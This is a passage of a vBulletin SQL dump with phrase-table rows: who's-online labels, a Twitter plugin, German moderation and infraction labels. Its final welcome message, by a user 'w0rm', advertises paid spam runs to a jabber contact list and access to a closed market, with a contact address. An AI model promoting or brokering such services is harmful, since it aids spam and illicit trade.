(39684, -1, 'copying_thread_to_forum', 'wol', 'Copying Thread: To Forum:', 'vbulletin', '', 0, ''),
(39685, -1, 'creating_album', 'wol', 'Creating Album', 'vbulletin', 'vBulletin Solutions', 1192801051, '3.7.0 Beta 1'),
(39686, -1, 'creating_event', 'wol', 'Creating Event', 'vbulletin', '', 0, ''),
(39687, -1, 'creating_poll', 'wol', 'Creating Poll', 'vbulletin', '', 0, ''),
(39688, -1, 'creating_private_message', 'wol', 'Creating Private Message', 'vbulletin', '', 0, ''),
(39689, -1, 'creating_social_group', 'wol', 'Creating Social Group', 'vbulletin', 'vBulletin Solutions', 1192639247, '3.7.0 Beta 1'),
(39690, -1, 'creating_thread', 'wol', 'Creating Thread', 'vbulletin', '', 0, ''),
(39691, -1, 'creating_user_note', 'wol', 'Creating User Note', 'vbulletin', '', 0, ''),
(39692, -1, 'deleting_album', 'wol', 'Deleting Album', 'vbulletin', 'vBulletin Solutions', 1192801013, '3.7.0 Beta 1'),
(39693, -1, 'deleting_picture_comment', 'wol', 'Deleting Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200395694, '3.7.0 Beta 4'),
(39694, -1, 'deleting_posts', 'wol', 'Deleting Posts', 'vbulletin', '', 0, ''),
(39695, -1, 'deleting_redirect', 'wol', 'Deleting Redirect', 'vbulletin', '', 0, ''),
(39696, -1, 'deleting_social_group', 'wol', 'Deleting Social Group', 'vbulletin', 'vBulletin Solutions', 1192639265, '3.7.0 Beta 1'),
(39697, -1, 'deleting_subscribed_forums', 'wol', 'Deleting Subscribed Forums', 'vbulletin', '', 0, ''),
(39698, -1, 'deleting_subscribed_threads', 'wol', 'Deleting Subscribed Threads', 'vbulletin', '', 0, ''),
(39699, -1, 'deleting_thread', 'wol', 'Deleting Thread', 'vbulletin', '', 0, ''),
(39700, -1, 'deleting_visitor_message', 'wol', 'Deleting Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370537, '3.7.0 Beta 1'),
(39701, -1, 'display', 'wol', 'Display', 'vbulletin', '', 0, ''),
(39702, -1, 'downloading_private_messages', 'wol', 'Downloading Private Messages', 'vbulletin', '', 0, ''),
(39703, -1, 'editing_album', 'wol', 'Editing Album', 'vbulletin', 'vBulletin Solutions', 1192801034, '3.7.0 Beta 1'),
(39704, -1, 'editing_pictures', 'wol', 'Editing Pictures', 'vbulletin', 'vBulletin Solutions', 1193833874, '3.7.0 Beta 1'),
(39705, -1, 'editing_social_group', 'wol', 'Editing Social Group', 'vbulletin', 'vBulletin Solutions', 1192636815, '3.7.0 Beta 1'),
(39706, -1, 'followed_forum_link', 'wol', 'Followed Forum Link', 'vbulletin', '', 0, ''),
(39707, -1, 'giving_infraction', 'wol', 'Giving Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39708, -1, 'giving_reputation', 'wol', 'Giving Reputation', 'vbulletin', '', 0, ''),
(39709, -1, 'guests', 'wol', 'Guests', 'vbulletin', '', 0, ''),
(39710, -1, 'inline_mod_approving_posts', 'wol', 'Inline Moderation: Approving Posts', 'vbulletin', '', 0, ''),
(39711, -1, 'inline_mod_approving_threads', 'wol', 'Inline Moderation: Approving Threads', 'vbulletin', '', 0, ''),
(39712, -1, 'inline_mod_clear', 'wol', 'Inline Moderation: Clearing Cookies', 'vbulletin', '', 0, ''),
(39713, -1, 'inline_mod_closing_threads', 'wol', 'Inline Moderation: Closing Threads', 'vbulletin', '', 0, ''),
(39714, -1, 'inline_mod_deleting_posts', 'wol', 'Inline Moderation: Deleting Posts', 'vbulletin', '', 0, ''),
(39715, -1, 'inline_mod_deleting_threads', 'wol', 'Inline Moderation: Deleting Threads', 'vbulletin', '', 0, ''),
(39716, -1, 'inline_mod_merging_posts', 'wol', 'Inline Moderation: Merging Posts', 'vbulletin', '', 0, ''),
(39717, -1, 'inline_mod_merging_threads', 'wol', 'Inline Moderation: Merging Threads', 'vbulletin', '', 0, ''),
(39718, -1, 'inline_mod_moving_posts', 'wol', 'Inline Moderation: Moving Posts', 'vbulletin', 'vBulletin Solutions', 1197976075, '3.7.0 Beta 3'),
(39719, -1, 'inline_mod_moving_threads', 'wol', 'Inline Moderation: Moving Threads', 'vbulletin', '', 0, ''),
(39720, -1, 'inline_mod_opening_threads', 'wol', 'Inline Moderation: Opening Threads', 'vbulletin', '', 0, ''),
(39721, -1, 'inline_mod_sticking_threads', 'wol', 'Inline Moderation: Sticking Threads', 'vbulletin', '', 0, ''),
(39722, -1, 'inline_mod_unapproving_posts', 'wol', 'Inline Moderation: Unapproving Posts', 'vbulletin', '', 0, ''),
(39723, -1, 'inline_mod_unapproving_threads', 'wol', 'Inline Moderation: Unapproving Threads', 'vbulletin', '', 0, ''),
(39724, -1, 'inline_mod_undeleting_posts', 'wol', 'Inline Moderation: Undeleting Posts', 'vbulletin', '', 0, ''),
(39725, -1, 'inline_mod_undeleting_threads', 'wol', 'Inline Moderation: Undeleting Threads', 'vbulletin', '', 0, ''),
(39726, -1, 'inline_mod_unsticking_threads', 'wol', 'Inline Moderation: Unsticking Threads', 'vbulletin', '', 0, ''),
(39727, -1, 'joining_social_group', 'wol', 'Joining Social Group', 'vbulletin', 'vBulletin Solutions', 1192636778, '3.7.0 Beta 1'),
(39728, -1, 'leaving_social_group', 'wol', 'Leaving Social Group', 'vbulletin', 'vBulletin Solutions', 1192636797, '3.7.0 Beta 1'),
(39729, -1, 'location_temp', 'wol', 'Location', 'vbulletin', '', 0, ''),
(39730, -1, 'logging_in', 'wol', 'Logging In', 'vbulletin', '', 0, ''),
(39731, -1, 'logging_out', 'wol', 'Logging Out', 'vbulletin', '', 0, ''),
(39732, -1, 'managing_attachments', 'wol', 'Managing Attachments', 'vbulletin', '', 0, ''),
(39733, -1, 'managing_reminder', 'wol', 'Managing Event Reminders', 'vbulletin', '', 0, ''),
(39734, -1, 'managing_spam', 'wol', 'Managing Spam', 'vbulletin', 'vBulletin Solutions', 1192801154, '3.7.0 Beta 1'),
(39735, -1, 'managing_tags', 'wol', 'Managing Tags', 'vbulletin', 'vBulletin Solutions', 1206012070, '3.7.0 Release Candidate 2'),
(39736, -1, 'marking_forums_read', 'wol', 'Marking Forums Read', 'vbulletin', '', 0, ''),
(39737, -1, 'merging_threads', 'wol', 'Merging Threads', 'vbulletin', '', 0, ''),
(39738, -1, 'moderating', 'wol', 'Moderating', 'vbulletin', '', 0, ''),
(39739, -1, 'moderator_control_panel_login', 'wol', 'Moderator Control Panel Login', 'vbulletin', '', 0, ''),
(39740, -1, 'modifying_avatar', 'wol', 'Modifying Avatar', 'vbulletin', '', 0, ''),
(39741, -1, 'modifying_contact_ignore_list', 'wol', 'Modifying Contact or Ignore List', 'vbulletin', 'vBulletin Solutions', 1197387961, '3.7.0 Beta 1'),
(39742, -1, 'modifying_event', 'wol', 'Modifying Event', 'vbulletin', '', 0, ''),
(39743, -1, 'modifying_options', 'wol', 'Modifying Options', 'vbulletin', '', 0, ''),
(39744, -1, 'modifying_password', 'wol', 'Modifying Password', 'vbulletin', '', 0, ''),
(39745, -1, 'modifying_poll', 'wol', 'Modifying Poll', 'vbulletin', '', 0, ''),
(39746, -1, 'modifying_post', 'wol', 'Modifying Post', 'vbulletin', '', 0, ''),
(39747, -1, 'modifying_private_message_folders', 'wol', 'Modifying Private Message Folders', 'vbulletin', '', 0, ''),
(39748, -1, 'modifying_profile', 'wol', 'Modifying Profile', 'vbulletin', '', 0, ''),
(39749, -1, 'modifying_profilepic', 'wol', 'Modifying Profile Picture', 'vbulletin', '', 0, ''),
(39750, -1, 'modifying_signature', 'wol', 'Modifying Signature', 'vbulletin', '', 0, ''),
(39751, -1, 'modifying_subscription_folders', 'wol', 'Modifying Subscription Folders', 'vbulletin', '', 0, ''),
(39752, -1, 'modifying_thread', 'wol', 'Modifying Thread', 'vbulletin', '', 0, ''),
(39753, -1, 'modifying_usergroups', 'wol', 'Modifying Usergroups', 'vbulletin', '', 0, ''),
(39754, -1, 'moving_thread_to_forum', 'wol', 'Moving Thread: To Forum:', 'vbulletin', '', 0, ''),
(39755, -1, 'moving_thread_with_redirect_to_forum', 'wol', 'Moving Thread (with Redirect): To Forum:', 'vbulletin', '', 0, ''),
(39756, -1, 'open_close_thread', 'wol', 'Opening/Closing Thread', 'vbulletin', '', 0, ''),
(39757, -1, 'posting_picture_comment', 'wol', 'Posting Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200395684, '3.7.0 Beta 4'),
(39758, -1, 'posting_visitor_message', 'wol', 'Posting Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370545, '3.7.0 Beta 1'),
(39759, -1, 'private_messaging', 'wol', 'Private Messaging', 'vbulletin', '', 0, ''),
(39760, -1, 'processing_joinrequests', 'wol', 'Processing Join Requests', 'vbulletin', 'vBulletin Solutions', 1206012812, '3.7.0 Release Candidate 2'),
(39761, -1, 'query_x', 'wol', 'Query: {1}', 'vbulletin', '', 0, ''),
(39762, -1, 'rating_thread', 'wol', 'Rating Thread', 'vbulletin', '', 0, ''),
(39763, -1, 'registering', 'wol', 'Registering', 'vbulletin', '', 0, ''),
(39764, -1, 'replying_to_thread', 'wol', 'Replying to Thread', 'vbulletin', '', 0, ''),
(39765, -1, 'reporting_picture_comment', 'wol', 'Reporting Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200395704, '3.7.0 Beta 4'),
(39766, -1, 'reporting_post', 'wol', 'Reporting a Post', 'vbulletin', '', 0, ''),
(39767, -1, 'reporting_visitor_message', 'wol', 'Reporting Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370555, '3.7.0 Beta 1'),
(39768, -1, 'request_activation_code', 'wol', 'Requesting Activation Code', 'vbulletin', '', 0, ''),
(39769, -1, 'resolve_ip_address', 'wol', 'Resolve IP Address', 'vbulletin', 'vBulletin Solutions', 1142948605, '3.6.0 Beta 1'),
(39770, -1, 'resolved_host_name', 'wol', 'Resolved Host Name', 'vbulletin', 'vBulletin Solutions', 1142948745, '3.6.0 Beta 1'),
(39771, -1, 'reversing_infraction', 'wol', 'Reversing Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39772, -1, 'search_bots', 'wol', 'Search Bots', 'vbulletin', '', 0, ''),
(39773, -1, 'search_engine_spider', 'wol', 'Search Engine Spider', 'vbulletin', '', 0, ''),
(39774, -1, 'searching_forums', 'wol', 'Searching Forums', 'vbulletin', '', 0, ''),
(39775, -1, 'searching_member_list', 'wol', 'Searching Member List', 'vbulletin', '', 0, ''),
(39776, -1, 'sending_aim_message', 'wol', 'Sending AIM Message', 'vbulletin', '', 0, ''),
(39777, -1, 'sending_forum_feedback', 'wol', 'Sending Forum Feedback', 'vbulletin', '', 0, ''),
(39778, -1, 'sending_icq_message', 'wol', 'Sending ICQ Message', 'vbulletin', '', 0, ''),
(39779, -1, 'sending_msn_message', 'wol', 'Sending MSN Message', 'vbulletin', '', 0, ''),
(39780, -1, 'sending_skype_message', 'wol', 'Sending Skype Message', 'vbulletin', '', 0, ''),
(39781, -1, 'sending_thread_to_friend', 'wol', 'Sending Thread to a Friend', 'vbulletin', '', 0, ''),
(39782, -1, 'sending_yahoo_message', 'wol', 'Sending Yahoo Message', 'vbulletin', '', 0, ''),
(39783, -1, 'spiders', 'wol', 'Spiders', 'vbulletin', '', 0, ''),
(39784, -1, 'stick_unstick_thread', 'wol', 'Sticking / Unsticking Thread', 'vbulletin', '', 0, ''),
(39785, -1, 'subscribing_to_forum', 'wol', 'Subscribing to Forum', 'vbulletin', '', 0, ''),
(39786, -1, 'subscribing_to_thread', 'wol', 'Subscribing to Thread', 'vbulletin', '', 0, ''),
(39787, -1, 'tracking_private_messages', 'wol', 'Tracking Private Messages', 'vbulletin', '', 0, ''),
(39788, -1, 'unable_resolve_ip', 'wol', 'Unable to resolve IP address', 'vbulletin', 'vBulletin Solutions', 1142948775, '3.6.0 Beta 1'),
(39789, -1, 'unknown_location', 'wol', 'Unknown Location', 'vbulletin', '', 0, ''),
(39790, -1, 'uploading_pictures', 'wol', 'Uploading Pictures', 'vbulletin', 'vBulletin Solutions', 1193833895, '3.7.0 Beta 1'),
(39791, -1, 'user_agent', 'wol', 'User Agent', 'vbulletin', '', 0, ''),
(39792, -1, 'user_is_invisible_to_others', 'wol', 'User is invisible to others', 'vbulletin', '', 0, ''),
(39793, -1, 'user_is_on_your_contact_list', 'wol', 'User is on your contact list', 'vbulletin', 'vBulletin Solutions', 1196420374, '3.7.0 Beta 1'),
(39794, -1, 'user_x', 'wol', 'User: {1}', 'vbulletin', '', 0, ''),
(39795, -1, 'viewing_album', 'wol', 'Viewing Album', 'vbulletin', 'vBulletin Solutions', 1192801124, '3.7.0 Beta 1'),
(39796, -1, 'viewing_announcement', 'wol', 'Viewing Announcement', 'vbulletin', '', 0, ''),
(39797, -1, 'viewing_archives', 'wol', 'Viewing Archives', 'vbulletin', '', 0, ''),
(39798, -1, 'viewing_attachment', 'wol', 'Viewing Attachment', 'vbulletin', '', 0, ''),
(39799, -1, 'viewing_attachment_list', 'wol', 'Viewing Attachment List', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39800, -1, 'viewing_attachments', 'wol', 'Viewing Attachments', 'vbulletin', '', 0, ''),
(39801, -1, 'viewing_avatars', 'wol', 'Viewing Avatars', 'vbulletin', '', 0, ''),
(39802, -1, 'viewing_bb_code', 'wol', 'Viewing BB Code', 'vbulletin', '', 0, ''),
(39803, -1, 'viewing_calendar', 'wol', 'Viewing Calendar', 'vbulletin', '', 0, ''),
(39804, -1, 'viewing_conversation', 'wol', 'Viewing Conversation', 'vbulletin', 'vBulletin Solutions', 1201131739, '3.7.0 Beta 5'),
(39805, -1, 'viewing_deleted_picture_comments', 'wol', 'Viewing Deleted Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200612299, '3.7.0 Beta 4'),
(39806, -1, 'viewing_deleted_posts', 'wol', 'Viewing Deleted Posts', 'vbulletin', 'vBulletin Solutions', 1150493360, '3.6.0 Beta 3'),
(39807, -1, 'viewing_deleted_social_group_messages', 'wol', 'Viewing Deleted Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1200612265, '3.7.0 Beta 4'),
(39808, -1, 'viewing_deleted_threads', 'wol', 'Viewing Deleted Threads', 'vbulletin', 'vBulletin Solutions', 1150493368, '3.6.0 Beta 3'),
(39809, -1, 'viewing_deleted_visitor_messages', 'wol', 'Viewing Deleted Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1200612248, '3.7.0 Beta 4'),
(39810, -1, 'viewing_error_message', 'wol', 'Viewing Error Message', 'vbulletin', '', 0, ''),
(39811, -1, 'viewing_event', 'wol', 'Viewing Event', 'vbulletin', '', 0, ''),
(39812, -1, 'viewing_faq', 'wol', 'Viewing FAQ', 'vbulletin', '', 0, ''),
(39813, -1, 'viewing_forum', 'wol', 'Viewing Forum', 'vbulletin', '', 0, ''),
(39814, -1, 'viewing_forum_closed', 'wol', 'Viewing \'Forum Closed\' Message', 'vbulletin', '', 0, ''),
(39815, -1, 'viewing_forum_leaders', 'wol', 'Viewing Forum Leaders', 'vbulletin', '', 0, ''),
(39816, -1, 'viewing_index', 'wol', 'Viewing Index', 'vbulletin', '', 0, ''),
(39817, -1, 'viewing_infraction', 'wol', 'Viewing Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39818, -1, 'viewing_ip_address', 'wol', 'Viewing IP Address', 'vbulletin', '', 0, ''),
(39819, -1, 'viewing_member_list', 'wol', 'Viewing Member List', 'vbulletin', '', 0, ''),
(39820, -1, 'viewing_moderated_picture_comments', 'wol', 'Viewing Moderated Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200614465, '3.7.0 Beta 4'),
(39821, -1, 'viewing_moderated_pictures', 'wol', 'Viewing Moderated Pictures', 'vbulletin', 'vBulletin Solutions', 1203952340, '3.7.0 Beta 6'),
(39822, -1, 'viewing_moderated_posts', 'wol', 'Viewing Moderated Posts', 'vbulletin', 'vBulletin Solutions', 1150493349, '3.6.0 Beta 3'),
(39823, -1, 'viewing_moderated_social_group_messages', 'wol', 'Viewing Moderated Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1200614450, '3.7.0 Beta 4'),
(39824, -1, 'viewing_moderated_threads', 'wol', 'Viewing Moderated Threads', 'vbulletin', 'vBulletin Solutions', 1150493341, '3.6.0 Beta 3'),
(39825, -1, 'viewing_moderated_visitor_messages', 'wol', 'Viewing Moderated Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1200614430, '3.7.0 Beta 4'),
(39826, -1, 'viewing_new_posts', 'wol', 'Viewing New Posts', 'vbulletin', '', 0, ''),
(39827, -1, 'viewing_no_permission_message', 'wol', 'Viewing \'No Permission\' Message', 'vbulletin', '', 0, ''),
(39828, -1, 'viewing_paid_subscriptions', 'wol', 'Viewing Paid Subscriptions', 'vbulletin', '', 0, ''),
(39829, -1, 'viewing_picture', 'wol', 'Viewing Picture', 'vbulletin', 'vBulletin Solutions', 1192801109, '3.7.0 Beta 1'),
(39830, -1, 'viewing_picture_comments_awaiting_approval', 'wol', 'Viewing Picture Comments Awaiting Approval', 'vbulletin', 'vBulletin Solutions', 1200396024, '3.7.0 Beta 4'),
(39831, -1, 'viewing_poll', 'wol', 'Viewing Poll', 'vbulletin', '', 0, ''),
(39832, -1, 'viewing_post_history', 'wol', 'Viewing Post History', 'vbulletin', 'vBulletin Solutions', 1193392289, '3.7.0 Beta 1'),
(39833, -1, 'viewing_printable_version', 'wol', 'Viewing Printable Version', 'vbulletin', '', 0, ''),
(39834, -1, 'viewing_private_message', 'wol', 'Viewing Private Message', 'vbulletin', '', 0, ''),
(39835, -1, 'viewing_smilies', 'wol', 'Viewing Smilies', 'vbulletin', '', 0, ''),
(39836, -1, 'viewing_social_group', 'wol', 'Viewing Social Group', 'vbulletin', 'vBulletin Solutions', 1192636897, '3.7.0 Beta 1'),
(39837, -1, 'viewing_social_group_list', 'wol', 'Viewing Social Group List', 'vbulletin', 'vBulletin Solutions', 1192639611, '3.7.0 Beta 1'),
(39838, -1, 'viewing_social_group_memberlist', 'wol', 'Viewing Social Group\'s Member List', 'vbulletin', 'vBulletin Solutions', 1192636914, '3.7.0 Beta 1'),
(39839, -1, 'viewing_social_group_subscriptions', 'wol', 'Viewing Social Group Subscriptions', 'vbulletin', 'vBulletin Solutions', 1225899541, '3.8.0 Beta 2'),
(39840, -1, 'viewing_subscribed_threads', 'wol', 'Viewing Subscribed Threads', 'vbulletin', '', 0, ''),
(39841, -1, 'viewing_tag_list', 'wol', 'Viewing Tag List', 'vbulletin', 'vBulletin Solutions', 1196958497, '3.7.0 Beta 1'),
(39842, -1, 'viewing_thread', 'wol', 'Viewing Thread', 'vbulletin', '', 0, ''),
(39843, -1, 'viewing_unread_picture_comments', 'wol', 'Viewing Unread Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200395999, '3.7.0 Beta 4'),
(39844, -1, 'viewing_user_control_panel', 'wol', 'Viewing User Control Panel', 'vbulletin', '', 0, ''),
(39845, -1, 'viewing_user_note', 'wol', 'Viewing User Note', 'vbulletin', '', 0, ''),
(39846, -1, 'viewing_user_profile', 'wol', 'Viewing User Profile', 'vbulletin', '', 0, ''),
(39847, -1, 'viewing_users_album', 'wol', 'Viewing User\'s Album', 'vbulletin', 'vBulletin Solutions', 1192801141, '3.7.0 Beta 1'),
(39848, -1, 'viewing_who_posted', 'wol', 'Viewing Who Posted', 'vbulletin', '', 0, ''),
(39849, -1, 'viewing_whos_online', 'wol', 'Viewing Who\'s Online', 'vbulletin', '', 0, ''),
(39850, -1, 'viewing_x', 'wol', 'Viewing {1}', 'vbulletin', '', 0, ''),
(39851, -1, 'voting', 'wol', 'voting', 'vbulletin', 'vBulletin Solutions', 1245171167, '3.8.3'),
(39852, -1, 'x_and_y_converse', 'wol', '{1} and {2}', 'vbulletin', 'vBulletin Solutions', 1201131770, '3.7.0 Beta 5'),
(39853, -1, 'x_spider_searchspider', 'wol', '{1} Spider', 'vbulletin', '', 0, ''),
(39854, -1, 'twitter_authfailed', 'error', 'We\'re sorry, but the Username and Password provided within your User CP could not be authenticated. Please modify either your Username or Password to match your current Twitter Username / Password and try again.', 'kk_vbtwitter', 'Jeremy', 1234137868, '1.0.0'),
(39855, -1, 'twitter_noid', 'error', 'We\'re sorry, but this post or thread could not be tweeted because you have not specified an ID. Please try again.', 'kk_vbtwitter', 'Jeremy', 1234138127, '1.0.0'),
(39856, -1, 'twitter_success', 'frontredirect', 'This has been successfully tweeted to your Twitter account.', 'kk_vbtwitter', 'Jeremy', 1234138538, '1.0.0'),
(39857, -1, 'twitter_checkout', 'global', 'Check this out! ', 'kk_vbtwitter', 'Jeremy', 1234137038, '1.0.0'),
(39858, -1, 'twitter_post', 'postbit', 'Tweet this Post!', 'kk_vbtwitter', 'Jeremy', 1234651296, '1.0.1'),
(39859, -1, 'twitter_thread', 'showthread', 'Tweet this Thread!', 'kk_vbtwitter', 'Jeremy', 1234661933, '1.0.1'),
(39860, -1, 'twitter_integration', 'user', 'Setting up integration with Twitter through this forum will turn on any \"Tweet This\" feature on this site. Setup integration by clicking here .', 'kk_vbtwitter', 'Jeremy', 1247609397, '1.0.3'),
(39861, -1, 'twitter_vb', 'user', 'vBTwitter', 'kk_vbtwitter', 'Jeremy', 1234644770, '1.0.1'),
(39862, -1, 'setting_twitter_key_pub_desc', 'vbsettings', 'For vBTwitter to work, you must register an application (register here ) and will receive a \"Consumer Key.\" Copy & Paste that key here! Please read the main post of vBTwitter\'s thread to find out more about registration.', 'kk_vbtwitter', 'Jeremy', 1247609870, '1.0.3'),
(39863, -1, 'setting_twitter_key_pub_title', 'vbsettings', 'Consumer Key', 'kk_vbtwitter', 'Jeremy', 1247609870, '1.0.3'),
(39864, -1, 'setting_twitter_key_sec_desc', 'vbsettings', 'For vBTwitter to work, you must register an application (register here ) and will receive a \"Consumer Secret.\" Copy & Paste that key here, but do not tell anyone else. This key must be kept secret! Please read the main post of vBTwitter\'s thread to find out more about registration.', 'kk_vbtwitter', 'Jeremy', 1247609876, '1.0.3'),
(39865, -1, 'setting_twitter_key_sec_title', 'vbsettings', 'Consumer Secret', 'kk_vbtwitter', 'Jeremy', 1247609876, '1.0.3'),
(39866, -1, 'settinggroup_twitter', 'vbsettings', 'vBTwitter', 'kk_vbtwitter', 'Jeremy', 1247185994, '1.0.3'),
(39973, 0, 'invisible1', 'global', 'is Invisible', 'vbulletin', '', 0, ''),
(39974, 0, 'nav_members_search', 'global', 'Advanced Members Search', 'vbulletin', '', 0, ''),
(39975, 0, 'nav_new_posts', 'global', 'Find New Posts', 'vbulletin', '', 0, ''),
(39976, 0, 'nav_search_options', 'global', 'Other Search Options', 'vbulletin', '', 0, ''),
(39977, 0, 'nav_todays_posts', 'global', 'Find Today\'s Posts', 'vbulletin', '', 0, ''),
(39978, 0, 'notice_14_html', 'global', '\r\n\r\nTeamspeak³ \r\nServer: 50.7.241.58 \r\nPort: 9987 \r\n \r\nIRC \r\nServer: irc.darkisland.biz:6666 \r\nChannel: #uc \r\n \r\n
\r\n', 'vbulletin', 'ucroot', 1301952053, '3.8.6'),
(39979, 0, 'notice_15_html', 'global', '
Planed Downtime in 1-4 Days ~ \r\n
\r\n \r\nVisit our twitterprofile:\r\n
\r\n
', 'vbulletin', 'Â¥akuza112', 1386484354, '3.8.7'),
(39980, 0, 'notice_16_html', 'global', '\r\n\r\nYou need at least 15 posts to get moved to Usergroup \"Member\"\r\n\r\nIf there are any problems, feel free to contact us\r\n ', 'vbulletin', 'Â¥akuza112', 1409069959, '3.8.7'),
(39981, 0, 'notice_17_html', 'global', 'Da du in letzer Zeit inaktiv warst, bist du aus dem Level2 entfernt worden, für weitere Informationen wende dich bitte an ¥akuza112 ;-)', 'vbulletin', '¥akuza112', 1397433298, '3.8.7'),
(39982, 0, 'notice_1_html', 'global', '\r\n\r\n\r\n\r\nDu willst einen Bannerplatz kaufen? Dann kontaktiere die Administration .\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n
\r\n \r\n \r\n
\r\n', 'vbulletin', 'Â¥akuza112', 1409069759, '3.8.7'),
(39983, 0, 'notice_8_html', 'global', '', 'vbulletin', 'Â¥akuza112', 1409069717, '3.8.7'),
(39984, 0, 'offline1', 'global', 'is Offline', 'vbulletin', '', 0, ''),
(39985, 0, 'online1', 'global', 'is Online', 'vbulletin', '', 0, ''),
(39986, 0, 'prefix_English_title_plain', 'global', '[English]', 'vbulletin', 'Â¥akuza112', 1389411025, ''),
(39987, 0, 'prefix_English_title_rich', 'global', '[English]', 'vbulletin', 'Â¥akuza112', 1389411025, ''),
(39988, 0, 'prefix_bewerbung_title_plain', 'global', '[Bewerbung]', 'vbulletin', 'Â¥akuza112', 1344707784, ''),
(39989, 0, 'prefix_bewerbung_title_rich', 'global', '[Bewerbung]', 'vbulletin', 'Â¥akuza112', 1344707784, ''),
(39990, 0, 'vbtag_cloud', 'global', 'Search Tags', 'vbulletin', '', 0, ''),
(40233, 0, 'new', 'global', 'Neu', 'vbulletin', 'Adduco', 1209497733, '3.7.0'),
(40542, 0, 'question2', 'hvquestion', 'Verify that you are an human and copy the text of this LINK ', 'vbulletin', 'Â¥akuza112', 1405552319, '3.8.7'),
(40543, 0, 'infractionlevel10_title', 'infractionlevel', 'Permanent Bann', 'vbulletin', 'Raiden', 1290789252, '3.8.6'),
(40544, 0, 'infractionlevel11_title', 'infractionlevel', '1 Tages Bann', 'vbulletin', 'Raiden', 1290758864, '3.8.6'),
(40545, 0, 'infractionlevel12_title', 'infractionlevel', 'Doppelaccount', 'vbulletin', 'Raiden', 1290789264, '3.8.6'),
(40546, 0, 'infractionlevel13_title', 'infractionlevel', 'Fraud', 'vbulletin', 'Â¥akuza112', 1329485428, '3.8.7'),
(40547, 0, 'infractionlevel5_title', 'infractionlevel', 'Spam', 'vbulletin', 'Cyber Tjak', 1329484092, '3.8.7'),
(40548, 0, 'infractionlevel6_title', 'infractionlevel', 'Falsches Subforum', 'vbulletin', 'Cyber Tjak', 1329484086, '3.8.7'),
(40549, 0, 'infractionlevel7_title', 'infractionlevel', 'Rufmord', 'vbulletin', 'Cyber Tjak', 1329484135, '3.8.7'),
(40550, 0, 'infractionlevel8_title', 'infractionlevel', 'Beleidigung', 'vbulletin', 'Cyber Tjak', 1329484126, '3.8.7'),
(40551, 0, 'infractionlevel9_title', 'infractionlevel', 'Ausdrucksweise', 'vbulletin', 'Cyber Tjak', 1329484077, '3.8.7'),
(40552, 0, 'prefixset_English_title', 'prefix', '[English]', 'vbulletin', 'Â¥akuza112', 1389411000, ''),
(40553, 0, 'prefixset_bewerbung_title', 'prefix', 'Bewerbung', 'vbulletin', 'Â¥akuza112', 1340916996, ''),
(40557, 0, 'reputation16', 'reputationlevel', 'Schlechter User', 'vbulletin', '»InVisible', 1294677644, '3.8.6'),
(42636, 0, 'invalid_redirect_url_x', 'error', 'Ungültige Weiterleitungs-URL ({1})', 'vbulletin', 'Adduco', 1310460271, '3.8.7'),
(46930, 0, 'setting_redirect_whitelist_desc', 'vbsettings', 'Aus Sicherheitsgründen erlaubt vBulletin Weiterleitungen nur innerhalb der Domain, unter der vBulletin installiert ist. Wenn Sie mehrere Domains für Ihr Forum nutzen, müssen Sie diese hier angeben. \r\nWenn Sie nur eine Domain nutzen, lassen Sie dieses Feld leer. \r\n \r\nBeispiel: \r\nhttp://www.meine-eine-domain.de \r\nhttp://www.meine-andere-domain.de \r\n \r\nHinweis: Trennen Sie mehrere Domains jeweils mit einem Zeilenumbruch und achten Sie darauf, dass am Ende kein Slash steht! (\"/\").', 'vbulletin', 'Adduco', 1310460547, '3.8.7 Patch Level 2'),
(46931, 0, 'setting_redirect_whitelist_title', 'vbsettings', 'Zusätzlich erlaubte Domains für eine Weiterleitung (Redirect Domain Whitelist)', 'vbulletin', 'Adduco', 1310460271, '3.8.7 Patch Level 2'),
(46936, 1, 'first_visit_message', 'global', 'The procedure for placing ads : \r\n \r\n * One-time ad placement: $ 10 \r\n\r\n * One-time ad placement + retweet: $ 30 \r\n\r\n * One-time ad placement + retweet + spamming jabber contact list (over 1000 customers): $ 50 \r\n \r\n * Seller account: advertising + retweet spamming jabber contact list fo + Access to the closed part of the Market: $ 200/month \r\n \r\n * Account with access to the closed part of the Market: $ 100 \r\n\r\n admin@w0rm.ws ', 'vbulletin', 'w0rm', 1442930266, '3.8.7');
DROP TABLE IF EXISTS `phrasetype`;
CREATE TABLE `phrasetype` (
`fieldname` char(20) NOT NULL DEFAULT '',
`title` char(50) NOT NULL DEFAULT '',
`editrows` smallint(5) unsigned NOT NULL DEFAULT '0',
`product` varchar(25) NOT NULL DEFAULT '',
`special` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`fieldname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `phrasetype` (`fieldname`, `title`, `editrows`, `product`, `special`) VALUES
('accessmask', 'Access Masks', 3, '', 0),
('album', 'Albums', 3, '', 0),
('attachment_image', 'Attachment / Image', 3, '', 0),
('banning', 'Banning Tools', 3, '', 0),
('bbcode', 'BB Code Tools', 3, '', 0),
('calendar', 'Calendar', 3, '', 0),
('cpglobal', 'Control Panel Global', 3, '', 0),
('cphelptext', 'Control Panel Help Text', 8, '', 1),
('cphome', 'Control Panel Home Pages', 3, '', 0),
('cpoption', 'Control Panel Options', 3, '', 0),
('cppermission', 'Permissions', 3, '', 0),
('cprank', 'Control Panel User Ranks', 3, '', 0),
('cprofilefield', 'Custom Profile Fields', 3, '', 0),
('cpstopmsg', 'Control Panel Stop Message', 8, '', 1),
('cpuser', 'Control Panel User Management', 3, '', 0),
